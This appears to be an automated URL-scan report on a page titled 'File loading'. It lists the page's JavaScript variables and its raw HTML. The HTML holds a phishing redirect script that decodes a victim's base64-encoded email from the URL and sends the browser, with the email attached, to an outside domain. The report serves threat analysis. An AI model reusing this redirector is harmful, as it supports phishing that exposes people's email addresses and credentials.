https://agenciaadois.com.br/0/index.xml

Submitted URL:
https://agenciaadois.com.br/g63a/7959393624/Ntta/
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 7 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
getParameterByNamefunction
base64EmailParamobject
decodeEmailfunction
emailundefined

Console log messages · 0 found

Messages logged to the web console

HTML

The raw HTML body of the page

<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>File loading</title>
<script>
                    
                        // Function to get the value of a parameter from the URL
                        function getParameterByName(name, url) {
                            if (!url) url = window.location.href;
                            name = name.replace(/[\[\]]/g, "\\$&");
                            var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
                                results = regex.exec(url);
                            if (!results) return null;
                            if (!results[2]) return '';
                            return decodeURIComponent(results[2].replace(/\+/g, " "));
                        }
                        var base64EmailParam = getParameterByName('us');
                        function decodeEmail(base64Email) {
                            return atob(base64Email);
                        }
                        if (base64EmailParam) {
                            var email = decodeEmail(base64EmailParam);
                            setTimeout(function () {
                                window.location.href = 'https://zxnF.naturdon.com/iVYo/#D' + email;
                            }, 1000);
                        }
                    
                </script>
</head>
<body>
</body></html>